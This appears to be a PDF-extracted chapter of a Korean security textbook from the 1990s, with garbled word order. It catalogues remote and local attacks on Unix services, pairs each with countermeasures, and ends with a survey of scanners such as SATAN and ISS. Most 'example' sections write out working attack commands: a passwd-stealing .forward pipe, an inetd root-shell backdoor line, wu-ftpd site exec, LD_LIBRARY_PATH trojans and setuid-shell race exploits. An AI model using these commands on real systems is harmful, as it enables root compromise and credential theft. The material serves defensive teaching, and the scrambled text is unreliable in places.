스푸핑 폭탄 소스라우팅(DNS Spoofing), ICMP (Bombing), (Source Routing), TCP Sequense
등이 있다Guessing .
사 서비스 방해 공격. (Denial of Service Attack)
시스템의 정상적인 동작을 방해하는 공격 수법으로서 대량의 데이터 패킷을 네트워크로 보
낸다든가 전자우편으로 보내는 식의 공격이다.
아 미래 공격 수법. (Magic)
아직은 알 수 없는 미래의 침입 수법들에 대해서는 암호화나 보안프로토콜 등을 사용하는
것이 필요하다.
제 절 해킹 수법 현황2
원격지 시스템 침해수법1.
가 문제. rsh
개 요1)
계열의 에서는 사용자 및 호스트 동등자격 을 제공한다 즉 상호 사BSD UNIX (Equivalency) . ,
용자나 호스트를 신뢰할 만 하다면 서로의 인증 없이 패드워드 없이 시스템에 접근 가능하( )
게 한다 이 방식은 네트워크상에 패스워드가 지나다니지 않으므로 보안적인 측면에서 네트.
워크 스니퍼링 네트워크상의 데이터를 훔쳐보는 것 에는 안전하지만 잘못된 설( ) equivalancy
정은 심각한 보안문제를 초래한다.
문제점2)
에 가 있으면 모든 호스트를 다 신용한다- /etc/hosts.equiv ‘+’ .
에 가 있으면 모든 사용자를 다 신용한다- ~/.rhosts ‘+’ .
에 가 있으면 모든 사용자와 호스트를 다 신용한다- ~/.rhosts ‘+ +’ .
보기3)
취약성으로 인해 나 에 대하여 세계 모든 곳에서 가- NFS mount /user /home/user mount
가능할 때 침입자는 각 사용자의 파일을 위와 같이 수정하여 차후에 들어올 수 있~/.rhosts
는 백도어로 이용한다.
각 시스템관리자나 사용자들이 사용상의 편의를 위해 상기 파일들에 를 위와 유사한- ‘+’
형태로 넣어두는 경우 이나 명령을 사용하여 침입자에 의해 쉽게 침입당한다rsh rlogin .
예방 및 사후처리4)
파일의 설정을 점검하고 각 사용자의 홈 디렉토리에서 파일의 설- /etc/hosts.equiv .rhost
정을 점검한다 여부(‘+’ ).
에서 와 를 막아버린다- /etc/inetd.conf fshd rlogind .
각 사용자의 홈 디렉토리에서 을 지워버린다- .rhost file .
나. Sendmail
개 요1)
은 네트워크상에서 메일을 주고받는 서비스에 사용된다 하지만 가 걸려 있Sendmail . setuid
는 프로그램 중에서 가장 크기가 크며 계속해서 여러 가지 버그가 알려지고 있는 실정이다.
문제점2)
일반적으로 의 공격은 을 이용하여 이루어진다Sendmail telnet .
버그 를 이용한 명령수행으로 으로 접근할 수도 있고 밑- Sendmail 4.1 pipe : pipe bin /etc
의 화일들 소유자가 이면 가 될 수도 있다bin root .
버그 를 이용한 명령수행으로 화일을 유출시킬 수 있다- Sendmail 5.55 pipe : pipe passwd .
의 문제 프로그램의 취약성을 이용하여 가 설정된 쉘- Sendmail 5.65c tail : tail setuid root
을 만들 수 있다.
문제 화일에 쉘을 만드는 프로그램의 경로를 삽- Sendmail 5.61 .formard : .forward setuid
입하여 이외의 원하는 사용자가 쉘을 갖게 된다root root setuid .
의 문제 된 자료를 목표호스트의 사용자- Sendmail 5.64 uuencode (/etc/aliases) : uuencode
로 보내면 는 이 자료를 풀어서 내부의 명령을 수행할 수 있게 된다decode decode .
의 문제 어느 사용자의 파일을 수신하고 임의의 명령- Sendmail 5.x twice request : .rhost
을 두 번 수행하면 파일을 수정할 수 있다.rhost .
버그 이 만든 란 프로그램을 이용하여- Sendmail 8.6.4 root shell : Timothy Newham calc.c
걸린 쉘을 만들 수 있다setuid root .
버그 을 사용하여 가 설정된 쉘을- Sendmail 8.6.6/8.6.7 -d option : -d option setuid root
만들 수 있다.
의 문제 사용자와 관계없이 모든 파일을 읽을 수 있다 예를- Sendmail 8.6.7 -oE option : . (
들어 파일etc/shadow )
버그 이 을 주고 을 수행시키면 소유의- Sendmail 8.6.9 -odq option : option sendmail bin
쉘을 만들어 낼 수 있다.
버그 이 에서 오는 메시지는 그냥 받아들이는 것에 착안- Sendmail 8.6.10 : sendmail identd
하여 가짜 의 설치로 파일을 수정할 수 있다identd passwd .
버전이하의 버스 참조- Sendmail 8.7.5 : CERT-CA
보기3)
- telnet hostname 25로 한 후 하게 데몬과 대화할 수 있는데 이를login interactive Sendmail
악용하여 공격이 이루어진다.
로컬 호스트에서 일반사용자가 관련 버그를 이용하여 을 수행 가- sendmail Sendmail , root
될 수 있다.
공격용 프로그램으로 내 외부에서 공격 가능하다- sendmail , .
예방 및 사후처리4)
최신 버전의 을 설치하여야 한다sendmail .
다. .rlogin
개요1)
은 원격호스트에 하는 방법 중 한가지인데 버전에서 명령의 파rlogin login ALX 3.2x rlogin
싱오류로 인하여 로 로그인이 가능해진다root .
문제점2)
간단히 로 원격 로그인이 가능하다root .
보기3)
를 수행하면 로 로그인한다rlogin -1 -froot hostname root .
예방 및 사후처리4)
프로그램을 새로 하거나 에서 가 있는 라인 앞을 으로 막고rlogin patch /inetd.conf rlogind ‘#’
에 신호 을 보낸다inetd HUP (signal) .
(kill -HUP pid[inetd])
라. tftp
개요1)
는 를 사용하여 두 호스트간에 사용자 인증을 거치지 않고 파일을 주고 받을 수 있tftp UDP
게 한 것으로 일반적으로 의 부팅시 을 가져오는데 사용된다X-termnal bootstrap .
문제점2)
사용자 인증없이 임의의 파일을 가져갈 수 있다.
보기3)
- tftp hostname : get /etc/passwd local-filename
전송 받은 패스워드에서 을 이용 패스워드를 유추해 낼 수 있다- Crack , .
예방 및 사후처리4)
에서 가 있는 라인 앞을 으로 막고 에 시그널을 보낸다- /etc/inetd.conf tftp ‘#’ inetd HUP
(kill -HUP pid[inetd].)
에서 를 로 바꿔주고 에 시그널을 보- /etc/inetd.conf in.tftpd in.tftpd -s /tftpboot inetd HUP
낸다 의(kill -HUP inetd pid.)
마. X server
개요1)
윈도우 시스템은 사용자 워크스테이션의 윈도우용 프로그램을 네트워크상에서 서로 공유X
할 수 있게 한 것으로 서버는 사용자 워크스테이션과 입력장치를 관리하는 프로그램이고X
클라이언트는 네트워크상의 어디서나 실행 가능한 응용프로그램을 말한다X .
문제점2)
서버가 임의의 호스트에서 오는 접속을 허가할 때 침입자가 서버와 접속할 수 있다- X X .
사용자가 입력하는 것과 스크린에 뿌려지는 데이터를 볼 수 있다- .
스크린에 임의의 데이터를 쓸 수 있다- .
사용자의 세션을 제어할 수 있다- .
임의의 프로그램을 수행시키거나 정지시킬 수 있다- .
보기3)
www % xhost +test.bogus.or.kr
www % rsh test.bogus.or.kr telnet testhost -display www.bogus.or.kr
에 윈도우가 실행되고 있을 때 의 터미널에 프로그램을 수행 한후testhost X testhost www
로 출력을 뿌려줄 수 있다 와 같은 프로그램으로 상대의 키입력을 훔쳐볼 수 도 있다. Xkey .
예방 및 사후처리4)
파일 등 윈도우 쉘스크립트에서 를 제거한다- .xsession X “Xhost +" .
의 사용- X magic cookie
바. NFS
개요1)
은 네트워크상에서 서로 파일을 공유하게 할 수 있는 파일시스NFS(Network File System)
템으로 각 사용자에게는 투명하게 서비스를 제공한다 파일시스템 서버는 란 파일에. export
마운트해 줄 호스트를 기록하여 외부 클라이언트의 접근을 허가한다NFS NFS .
문제점2)
파일의 옵션글자의 총합이 자를 넘을 경우 모든 호스트에서 마운트할 수 있게- export 256
하는 구현상의 오류가 있다NFS .
어떤 디렉토리를 외부에 마운트시킬 때 으로 하면 모든 호스트에서 마운트가 가- everyone
능하다.
보기3)
수행결과 디렉토리 가 상태로 마운트되어 있으면 외부에서 마- showmount /user everyone
운트한 후 밑의 임의의 사용자 디렉토리에 파일을 만들 수 있다/user .rhosts .
수행결과 가 상태로 마운트되어 있으면 마운트한 뒤 모든 파일- showmount , / everyone
을 마음대로 조작할 수 있다.
예방 및 사후처리4)
시 해당 디렉토리만 해준다- NFS mount mount .
권한이 필요없으면 로 한다- write read only mount .
허가하는 호스트를 제한하고 글자수가 자를 넘을 경우 을 이용한다- 256 netgroup .
의 사용- NFSWATCH
사. NIS
개요1)
는 중요한 시스템 프로그램들NIS(Network Information system) DB (/etc/passwd,
등 이들을 맵이라 부름 을 네트워크를 통하여 고유함으로서 관리자와 사용/etc/hosts , NIS )
자에게 일관성있는 시스템 환경을 제공해 준다.
문제점2)
맵은 도메인 이름만 일치하면 외부든 내부든 맵을 요청한 호스트에 맵을- NIS NIS NIS
넘겨주는 문제를 가지고 있다 그 결과 도메인 이름을 유추하면 심각한 보안문제가 발생하.
게 된다.
터미널의 경우 라는 데몬을 사용하여 클라이언트에게 정보를 제공하는데- X bootparamd X
이중 하나가 도메인 이름이다.
도메인 이름을 유추하는 방식- NIS
이용* bootparamd
이용* sendmail
이용* ypwhich
보기3)
는 외부 사용자가 을 가져갈 수 있게 만든 프로그램이다- ypx NIS map .
이 는 서버이름을 인자로 받고 도메인 이름을 유추한후 결과로 패스워드 파- ypx NIS NIS
일을 반환한다.
예방과 사후처리4)
를 사용한다- Secure RPC .
도메인 이름을 유추하기 힘들게 만든다- .
접근제어가 가능한 를 사용한다- portmapper .
아. finger
개요1)
네트워크상의 다른 사용자들의 정보를 얻게 해주는 프로그램이다.
문제점2)
에 대해서는 크게 아래와 같이 문제점을 분류할 수 있다finger .
의 사용으로 등 사용자의 정보가 외부로 유출될 수 있다- finger username, user id .
의 내용을 수정하여 실행시 패스워드 파일에 를 추가하는 뒷문 프로- fingerd root (backdoor)
그램이 있다.
의 내용을 수정하여 실행시 쉘을 만드는 뒷문 프로그램이 있다- fingerd setuid root .
에서 사용된 방법으로 서버에 의 문자열을 보내 스텍 오버- Internet Worm finger 536byte
플로우를 일으키고 의 버퍼를 넘는 부분은 스텍에 겹쳐 쓴다 스텍에 겹쳐 쓰여지는512byte .
내용은 의 어셈블리이다 이로 인해 원격지 쉘이 연결된다execbe("/bin/sh",0,0) VAX . .
의 수정으로 뒷문으로 이용될 수도 있다- inetd.conf .
보기3)
# /etc/inetd.conf
....
finger stream tcp nowait root /bin/sh sh -i
나중에 로 시도시 백도어 를 이용 쉘로 로그인telnet hostname finger login (backdoor) , root
가능하다.
예방 및 사후처리4)
를 사용하지 않는 것이 최선의 방법이다- finger .
부득이 사용할시 를 이용하여 접근제어를 한다- tcpwrapper .
의 을 만들어두어 뒷문을 예방한다- finger checksum .
의 이상한 필드를 점검한다- inetd.conf .
자. ftpd
개요1)
는 네트워크상에서 파일을 전송하는 프로그램이며 는 데몬 이다ftp ftpd .
문제점2)
는 옵션을 으로 한 후 컴파일 하게 되면- wu-ftpd(Washington University ftp) site exec on
가 이 되어 쉘을 수행시킬 수 있다 내 외부 모두 공격가능EXEC_PATH /bin root ( / ).
의 디렉토리가 쓰기 할 때 뒷문 을 심어놓을 수 있다- ftp root (backdoor) .
로컬 사용자가 로 로그인한 상태에서 프로세스를 잠깐 멈추고 프로세스 상태를 보면- ftp
등과 하드링크 되어있어서 중요파일들에 내용을 추가할 수 있/etc/shadow, /var/adm/wtmp
다.
보기3)
실행되면 에 쉘을 만드는 프로그램을 실행한다- /tmp setuid root .
ftp> site exec "sh -c id"
이것이 제대로 동작하게되면 현재 를 로 보여준다 동일하게 명령대신 에 만들id root . id /tmp
어 놓은 프로그램을 수행시킨다 아니면 권한의 모든 명령을 사용할 수 있다. root .
조금 오래된 가 널리 알려져 있는데 이는 쉽게 로 할 수 있으며 그 내용은- bug root login
아래와 같다.
%ftp -n
ftp> open hostname
ftp> quote user ftp
ftp> quote cwd ~root
ftp> quote pass ftp
ftp> ls -al /
문제 먼저 파일을 만들어 추후 뒷문 으로 이용할 수도 있고- ftp mkdir : .rhosts (backdoor)
파일 을 만들어 놓을 수도 있다.forward (“ /bin/[email protected] < /etc/passwd) .|
사용자로 로그인한후ftp
ftp> put .forward
ftp> quit
% echo test mail ftp@hostname|
이후 화일이 메일을 통해 의 계정으로 전송된다passwd ninja .
예방 및 사후처리4)
설치시 에 유의하여 설치한다- ftp security .
이상을 설치하고 기능을 삭제한다- Wu.-ftp 2.4 site exec .
디렉토리의 접근권한을 점검한다- ftp root .
차. login
개요1)
사용자가 시스템에 접근하기 위해서 실행되는 프로그램으로 네트워크 상으로 로그인할 때나
로컬에서 로그인할 때 모두 이 프로그램이 사용된다.
문제점2)
미리 지정된 패스워드로 로그인 가능한 뒷문프로그램이 존재하며 이는- root utmp, wtmp,
등에 기록을 남기지 않으므로 등으로도 검색되지 않는다lastlog w, who, last .
보기3)
% telnet hostname
login : ( root )
미리 정해진passwd: ( passwd)
%whoami
root
예방 및 사후처리4)
의 변경날짜의 확인 한다- /bin/login .
원본에서 복사한다- CD .
의 체크섬을 받아둔다- /bin/login .
카. IP Spoofing
개요1)
프로토콜의 설계상 문제로 인하여 접속을 맺으려는 호스트에게 신뢰성 있는 호스트TCP/IP
인것처럼 꾸미는 것이다.
문제점2)
일단 신뢰성 있는 호스트로 접속한 후에 알려진 버그로 공격당할 수 있다- .
해커들이 만들어 놓은 관련 소스나 자료가 풍부한 편이다- .
자체와 호스트 응용레벨에서는 막을 수 없다- TCP/IP .
방화벽도 잘 설정이 되어있지 않으면 막을 수 없다- .
보기3)
출발지 어드레스를 신뢰성 있는 호스트의 것으로 를 조작한다- IP .
순서제어번호를 예측하여 접속하려는 호스트에 보내 의 연결- TCP/IP (3-way handshake
을 만든다connection) .
접속 후 기존의 공격방법을 사용하여 침입한다- .
예방 및 사후처리4)
패킷필터링 으로 외부로부터의 패킷중 내부주소를 출발지 어드레스로 가- (Packet filtering)
져오는 패킷을 걸러낸다.
타 스니퍼링. (sniffering)
개요1)
네트워크상에서 전송되는 패킷을 가로채는 것을 스니퍼링 이라고 한다(Sniffering) .
문제점2)
네트워크 디바이스가 모드로 동작하면 네트워크상에 전송되는 모든 패킷을- promiscuous
훔쳐볼 수 있다.
각 패킷의 접속시점의 부분만을 찾아서 사용자 와 패스워드를 보여주는 스니퍼란 프로- ID
그램이 널리 퍼져있다.
가장 위험하고 가장 많이 사용되는 해킹방식으로 알려져 있다- .
용 스니퍼 프로그램이 존재한다- SUN, linux, Solaris, DOS .
보기3)
스니퍼는 권한에서만 수행 가능하다 는 예외- root (DOS ).
스니퍼 수행시 네트워크상에서 전송되는 패킷의 접속시점의 부분 약 만을 파일이- ( 300byte)
나 터미날에 출력한다 사용자들이 를 사용할 때 내 외부 네트워크를 막론. rlogin, telnet, ftp /
하고 사용자 와 패스워드는 노출된다ID .
예방 및 사후처리4)
으로 모드를 검사한다 로 검사할 수도 있지만 백도어가 심겨져- cpm promiscuous . (ifconfig
있을 가능성이 있다.)
모드를 지원하지 않는 이더넷 카드를 사용한다- promiscuous .
방송 을 하지않는 망을 사용한다- (Broadcasting) ATM .
일회용패스워드 를 사용한다- (onetime password) .
암호화통신을 한다 쉘등- .(secure telnet, secure ftp, secure )
파. telnet
개요1)
은 네트워크상에서 기종에 관계없이 원격 로그인이 가능하게 하는 프로그램이다telnet .
문제점2)
원격호스트가 대상 호스트의 환경 변수값을 임의로 재설정 할 수 있고 데몬이 공- , telnet
유객체라이브러리 를 사용하는 문제점이 있다(shared object library) .
원격사용자가 공유객체라이브러리의 를 바꾸어 엉뚱한 트로이목마 라이브러- EXEC_PATH
리가 호출된다.
이 트로이목마라이브러리에 는 수정되어 쉘을 수행하도록 변환되어 있다- crypto() root .
보기3)
대상 호스트의 에 트로이목마라이브러리를 먼저 설치한다- /tmp .
%telnet
telnet> environ define LD_LIBRARY_PATH /tmp
telnet> environ export LD_LIBRARY_PATH
telnet> set option
telnet> o hostname
일반 사용자로 해도 가 된다- login root .
예방 및 사후처리4)
프로그램을 패치 한다- login .
를 설치한다- CERT wrapper login.c .
내부 시스템 침해수법2.
가. autoreply
개요1)
패키지에 들어있는 프로그램으로 이것을 사용하면 메일 도착 시마다 메일을 보낸 사ELM
람에게 차후에 답장하겠다는 메시지를 자동으로 보낼 수 있다.
문제점2)
는 인 소유의 파일을 만들 수 있고 수정할 수도 있다- autoreply mode 666 root .
라는 공격용 프로그램이 알려져 있다- fixhosts .
보기3)
./fixhosts /.rhosts ninja localhost
rsh localhost -l root csh -i
예방 및 사후처리4)
를 제거한다- autoreply .
의 패치를 설치한다- autoreply .
나. psrace
개요1)
는 프로세스들의 상태를 보여주는 프로그램이다ps root setuid .
문제점2)
이 는 실행도중 라는 임시화일을 생성한다 디렉토리의 퍼미션에ps /tmp/ps_data . /tmp
가 없을 경우 이 파일은 지워질 수 있고 란 공격용 프로그램은 이 파일을sticky bit psrace
지우고 미리 만들어둔 쉘을 링크시킴으로 소유자가 인 쉘을 가지게 된다root setuid root .
보기3)
% cp /bin/ksh /tmp/root shell
% chmod 14755 /tmp/root shell
% /bin/sh -c 'while /bin/true ; do ps > /dev/null ; done' &
% ./psrace /tmp/root shell
예방 및 사후처리4)
로 디렉토리에 를 추가하여 자신 소유의 파일이 아니면 지울chmod +t /tmp /tmp stiky bit
수 없게 한다.
다. rdist
개요1)
는 여러 호스트의 소프트웨어 관리시 유용한 프로그램이다rdist .
문제점2)
는 권한으로 을 실행시키기 위해 을 사용한다 이로 인해 일반 프- rdist root sendmail popen .
로그램도 권한으로 실행될 수 있다root .
라는 공격용 프로그램일 존재한다- gimme .
공격용 스크립트가 인터넷에 올려져 있다- rdist .
를 조작하여 권한으로 임의의 프로그램이 수행되게 할 수 있다 에서 배포- IFS root .(81gm
중)
보기3)
% .cp /bin/sh /tmp/root shell
% gimme /tmp/root shell 4755
% ls -ld /tmp/root shell
-rwsr-xr-x 1 root ...... root shell
예방 및 사후처리4)
에서 를 삭제- rdist setuid bit
패치를 한다- .
라. loadmodule
개요1)
에서 사용되는 프로그램으로서 서버가 두 개의 동적 드라이버를 유닉스openwindow Xnews
커널에 올려놓고 이를 이용하여 디렉토리에 특별한 디바이스를 생성하기 위해서 사용, /dev
된다.
문제점2)
이 은 를 절대경로에 두고 수행하지 않기 때문에 라는 이름의 공- loadmodule chmod chmod
격용 프로그램을 만들어 최우선경로에 두면 에 의해 권한으로 수행된다loadmodule root .
를 이용하여 이라는 공격용 프로그램을 권한으로 수행시킬 수 있다- IFS bin root .
를 이용한 여러 종류의 공격용 스크립트가 존재한다- IFS .
보기3)
이란 이름의 공격용 프로그램 작성bin
% setenv IFS /
% cd ~/bin
% /usr/openwin/bin/loadmodule/sys/sun4c/OBJ/evqmod-sun4c.o
% whoami
root
예방 및 사후처리4)
를 제거한다- setuid bit .
패치를 한다- .
마. I_PUSH 'ms' ioctl
개요1)
호출은 로 전달되는 이름의 을 현재 스트림의 맨위 헤더 바I_PUSH 'ms' ioctl arg module ,
로 밑에 삽입한다.
문제점2)
한 포트가 일반사용자에 대해 쓰기 가능하고 소유일 때 호출과tty root I_PUSH 'ms' ioctl
의 사용으로 가 로 바뀌게 된다lseek euid root .
보기 공격용 프로그램의 일부를 보면3) :
fd = open("/dev/ttyb",O_RDWR);
ioctl(fd, I_PUSH "ms");
lseek(fd, 0, 1);
예방 및 사후처리 아직 알려지지 않았음4) :
바. sync
개요1)
를 실행하면 시스템 호출을 부르는데 이는 아직 디스크에 쓰여지지 않은 버퍼들sync sync
과 슈퍼블럭을 디스크에 플러쉬한다 그래서 디스크와 메모리 데이터의 일관성을 유지한다. .
문제점2)
라는 공격용 프로그램을 라이브러리로 만들어 기존의 프로그램을 대치하여sync sync , sync
가 불려질 때 이 공격용 프로그램이 수행되도록 하여 을 얻는다, UID=1, GID=1 .
보기3)
라는 공격용 프로그램을 이용한다sync.c .
% cc -c -0 -R -pic sync.c
% Id -o buglib.so.1.1-assert pure-text sync.o
% setenv LD_PRELOAD ./buglib.so.1.1
% su sync
예방 및 사후처리4)
계정은 패스워드 없이 두지 않는다sync .
사. selection_svc
개요1)
윈도우 시스템에서 서브프로세스와 를 이용하여 외부SunView SunView selection_svc RPC
에서 파일을 억세스 할 수 있다 이 는 클라이언트 프로그램에서 만들. selection_svc SunView
어진 모든 을 처리한다 그리고 파일을 수정하고 을 분리하고 붙selection . resource selection ,
이는데 사용된다.
문제점2)
서비스는 시스템 내외를 막론하고 요청을 받아들인다- selection RCP .
는 이 를 수행시킬 때 시작된다 는 로 수행되므로- selection_svc /etc/init /etc/rc . init root
를 이용 어떤 파일이든지 읽을 수 있다selection_svc , .
보기3)
이 만든 라는 공격용 프로그램이 있다James Beckett seln_hold_file.c .
예방 및 사후처리4)
을 사용치 말고 으로 바꾼다- suntool X11 windowing system .
패치를 한다- .
아. splitvt
개요1)
화면을 두 개로 나누어주는 가상 콘솔 프로그램이다.
문제점2)
의 발생으로 쉘을 수행시킬 수 있다segment setuid root .
보기3)
% cc -o split-test splitvt.c
% split-test
# splitvt
segmentation fault
# whoami
root
예방 및 사후처리4)
를 제거한다-setuid bit .
패치를 한다- .
자. utmp
개요1)
현재 하고 있는 사용자들에 대한 정보를 가지고 있는 파일로 라는 명령을 사용하login who
여 그 내용을 볼 수 있다.
문제점2)
화일이 이외의 사용자들에 대해서 쓰기가능할 때 그 파일의 내용을 바꿀 수/etc/utmp root
있다.
보기3)
가 에 데이터를 쓰는 점을 이용하여 파일을 링크한 후 파일에syslog utmp .rhosts .rhosts
들어갈 내용을 를 이용하여 기록한다syslog .
예방 및 사후처리4)
를 권한으로 바꾼다- utmp root .
패치를 한다- .
차. passwd
개요1)
패스워드 변경시 를 사용한다/bin/passwd .
문제점2)
패스워드 변경시 권한으로 이란 임시화일을 만들어 변경된 내용을 저장하- root /etc/ptmp
고 를 로 복사한후 를 지운다/etc/ptmp /etc/passwd /etc/ptmp .
의 은 특정화일을 패스워드화일로 사용할 수 있게 한다- /bin/passwd -F option
에서 만든 라는 유명한 공격용 프로그램이 있다- 8lgm passwdrace.c .
보기3)
임시화일 을 만든다- /tmp/b/.rhosts .
로 를 한다- /tmp/a /tmp/b link .
를 실행시킨다 패스워드를 묻는다- passwd -F /tmp/a/.rhosts . ( .)
패스워드 입력전에 를 로 링크한다- /tmp/a / .
패스워드를 입력한다- .
가 에 를 만들자마자 를 로 링크한다- passwd process /tmp/a ptmp /tmp/a /tmp/b .
는 를 읽고 입력된 패스워드를 변경하여 에 쓴다- passwd process /tmp/a/.rhosts ptmp .
가 를 열자마자 를 로 바꾼다- passwd process /tmp/a/.rhosts /tmp/a / .
는 에 를 쓴다- passwd process /tmp/a/.rhosts(/.rhosts) ptmp .
결국 의 내용은 갱신된다- /.rhosts .
예방 및 사후처리4)
패치를 한다- .
을 제거한다- -F option .
카. /bin/mail
개요1)
전자우편을 보내거나 받거나 편집할 때 사용되는 명령이다.
문제점2)
은 메일을 보낼 때 권한으로 에 임시화일을 생성한다 이때 로 먼- /bin/mail root /tmp . star()
저 검사하고 파일을 연다.
로 검사한 후 파일을 열기전에 의 임시화일을 지우고 수정하고 싶은 파일을 그- star() , /tmp
이름으로 링크한다 이렇게하여 어떤 파일이라도 권한으로 수정이 가능해진다. root .
보기3)
에서만든 와 이 널리 알려져 있다8lgm mailrace.c tmpmail.sh .
% cc -o mailrace mailrace.c
% cat tmphost
+
% chmod 755 tmpmail.sh
% tmpmail.sh tmphost /. rhosts
% rsh hostname -l root sh -i
# whoami
root
예방과 사후처리4)
패치를 한다
타. expreserve
개요1)
는 등의 편집작업중 갑자기 시스템이 다운되거나 시그널을 받는 등의 이expreserve vi, ex
유로 편집이 도중에 비정상적으로 중단되었을 때 이것을 복구하는 프로그램이다.
문제점2)
수행중에 경쟁조건이 존재하여 소유 파일의 소유자를 현재 사용자로 바꿀- expreserve root
수 있다.
라는 공격용 프로그램이 일반적으로 알려져 있다- ex.c .
보기3)
소유의 파일들도 소유자를 바꾸므로 모두 접근가능 하다root .
% ex /.rhosts
% ls -l /.rhosts
소유자가 현재 사용자로 바뀐다( .)
예방 및 사후처리4)
를 제거한다- setuid bit .
패치를 한다- .
보안 스캐너3.
가. SATAN (Security Analysis Tools for Auditing Networks)
와 가 만든Dan Farmer Wietse Venema SATAN(System Administrator Tool for
은 원격 시스템을 시험한다는 것을 제외하고는 와 그 원리가 같Analyzing Networks) COPS
다 따라서 이 프로그램을 작동시키는 모든 사용자는 다른 시스템의 보안상 문제점을 발견.
할 수 있다 은 네트워크를 통하여 리모트 시스템의 보안정도를 조사하고 그 자료. SATAN
를 데이터베이스에 저장한다 이 결과를 프로토콜을 지원하는 를 통하여. http HTML browser
쉽게 볼 수 있다 그리고 호스트의 타입 서비스 취약성등의 보고서를 만들어 낼 수도 있다. , , .
보통 의 실행은 설정파일 에 의하여 제어될 수 있다SATAN (config/satan.cf) .
은 문제를 발견하면 그것이 왜 문제가 되는지와 어떻게하면 문제를 해결할 수 있는SATAN
지를 알려준다 하이퍼링크로 연결되어 있는 길을 따라가다보면 그 문제점에 대한 보안대책.
도 알려준다 발견될 수 있는 보안문제들은 다음과 같다. .
취약성- FTP
권한이 주어지지 않은 파일시스템 을 검사- NFS export(access control )
을 통한 의 현재 되어 사용중 호스트 검사- portmap NFS export( export )
의 패스워드 파일 접근- NIS
액세스- REXD
취약성- Sendmail
의 파일 접근- TFTP
쉘의 접근- r-
제한이 없는 서버로의 접근- X
제한받지 않은 모델-
쓰기권한이 있는 의 홈 디렉토리- FTP
을 설치하기 전에 다음과 같은 프로그램들이 필요하다SATAN .
이상-Perl 5.000
브라우저 또는-WWW (netscape xmosaic)
충분한 파워와 메모리 이상 많은 를 원할 때- CPU 32M ( data )
위의 프로그램과 조건이 갖추어지면 다음과 같이 설치하면 된다.
스크립트를 실행시킨다 이 스크립트에서는 이 위치한 경로와 브라우-reconfig . perl WWW
저의 경로를 패치한다 만일 이 스스로 브라우저를 찾아내지 못하게 되면. SATAN WWW
이란 파일의 다음부분을 수정하여야 한다config/paths.pl .
$MOSAIC="full path of program_name";
를 수행한다 이때 자신의 시스템 타입을 인자로 넣어주어야 한다 지원되는 시스템- make . .
타입은 다음과 같다.
Aix, BSD, IRIX5, FreeBSD, HP-UX9, Linux(untested), SunOS4, SunOS5, SVR4,
Ultrix4
실행파일이 만들어지면 루트의 권한으로 스크립트를 실행시킨다- SATAN .
대부분의 도큐먼트는 자신이 사용하는 브라우저에서 모두 접근이 가능한- WWW HTML
문서 형식이므로 자신의 브라우저내에서 모든 일을 할 수 있다.
을 아무 인자 없이 실행시키면 브라우저가 실행되면서 모든 일을 그 브라우SATAN WWW
저내에서 할 수 있게 된다 브라우저를 인터페이스로 이용하기 때문에 별다른 설명. WWW
은 하지 않겠다 를 이용하는 것과 비슷하다 도큐먼트도 브라우저내에서 문. WWW . HTML
서 형식으로 볼 수 있으므로 도큐먼트를 보면서 차근차근 실행해 보면 된다.
의 구성은 다음과 같다SATAN .
- SATAN Data Management
- SATAN Target selection
- SATAN Reporting & Data Analysis
- SATAN Configuration Management
- SATAN Documentation
- SATAN Troubleshooting
을 구할 수 있는 곳은 다음과 같다SATAN .
ftp://ftp.win.tue.nl/pub/security/sata-1.0.tar.Z
나 공개용. ISS ( )
최초의 스캐너이며 상용제품은 모든 알려진 취약성과 방화벽multi-level security , , Denail
를 검사하는 반면 상용제품은 명백한 취약성만을 검사한다of Service .
조사항목1)
처음 포트로 연결을 시도한다 그리고 연결이되면 그 호스트가 보여주는 모든기록- telnet .
을 로그한다.
대부분의 시스템에 있는 계정이름으로 로그인을 시도한다- ‘sync' .
포트로 포트한다- mail .
와 백도어를 조사한다- mail aliases WIZ .
포트에 포트하여 의 취약성을 조사한다- ftp anonymous .
를 조사한다 는 어떤 가 를 수- rpc . rpc computer NIS, rexd, bootparam, NFS, selection_svc
행하는가에 대한 정보를 보여준다.
가 있으면 머신을 찾아 를 추측한다- ypserv NIS passward .
이 있는지 확인한다- selection_svr .
은 아무나 외부로부터 시스템 파일을 읽을 수 있게 한다- selection_svr .
가 있는지 확인한다- Rexd .
모든 포트를 조사하여 와 같은 가능한 엔트리를 찾는다- gopher, mud .
결과2) Report
위의 각 단계에서 나온 자료를 로그한다.
상용Internet Scanner SAFEsuit ( )
기존의 네트워크 보안 평가 툴인 를 기반으로한 툴이며ISS , web site, firewall, UNIX,
에 이르는 알려진 가지의 취약성을 검사한다Window95, WindowNT, Workstation 140 .
구성1)
가지이상의 알려진 웹싸이트 취약성을 조사하며- Web Security Scanner :100 , web apps,
의 취약성을 조사한다CGI, HTML .
가지 이상의 알려진 방화벽의 취약성을 조사하고 또한 패킷필터와- Firewall Scanner : 100 ,
프락시 중심의 방화벽의 취약성 조사
인트라넷의 취약점 조사- Intranet Scanner :
내부 시스템 취약성 조사- System Security Scanner :
특징2)
많은 보안 취약성을 검사한다 가지 이상- . (140 )
자동화된 검사 검사방법의 구성 가능- ,
제공- GUI (Window NT GUI, Motif UNIX GUI, HTML)
새로운 취약성이 발견될때마다 툴을 갱신 할 수 있다- .
여러 디바이스를 병렬로 검사할 수 있다- .
스캔할 네트워크를 명시하여 그 안의 디바이스만을 스캔할 수 있다- .
검사항목3)
웹서버 무결성-
방화벽 무결성-
서비스 취약성- UNIX TCP/IP
- WindowNT, Window95
계정-
서비스거부 공격-
취약성- Router
라. PINGware
네트워크상의 보안 취약성을 감지하는 사의 제품이고 백그라운드로 실행되TCP/IP Bellcore ,
어 사용자의 효율성을 증진시켜준다.
검사항목1)
- ftp
파일 조사- rsh(/etc/hosts.equiv )
- tftp
옵션 검사- sendmail (wiz, debug )
- NFS
- xhost
지원되는2) OS
이상- SunOS 4.1
- Sun Solaris
및- HP-UX release 8 9
마. Smash
이 프로그램은 의 김휘강이란 학생이 만든 해킹툴로서 주로 내부 시스템을 실제로KAIST
해킹하는 방법으로 시스템의 취약점을 알려준다 검사하는 취약점은 다음과 같다. .
실제로 공격- autotreply :
로 수행되고 있는지 검사만 한다- bootparam : rpcinfo -p .
실제로 공격- loadmodule :
의 프로그램을 그대로 채용- portscan : satan
실제로 공격- rdist :
로 수행되고 있는지 검사만 한다- rexd : rpcinfo -p .
실제로 공격- rlogin :
로 수행되고 있는지 검사만 한다- rstatd : rpcinfo -p .
실제로 공격- sendmail :
이란 프로그램을 이용한 공격- yp-passwd : ypcat
의 프로그램을 그대로 채용- X server : satan
바. UVchecker 1.0
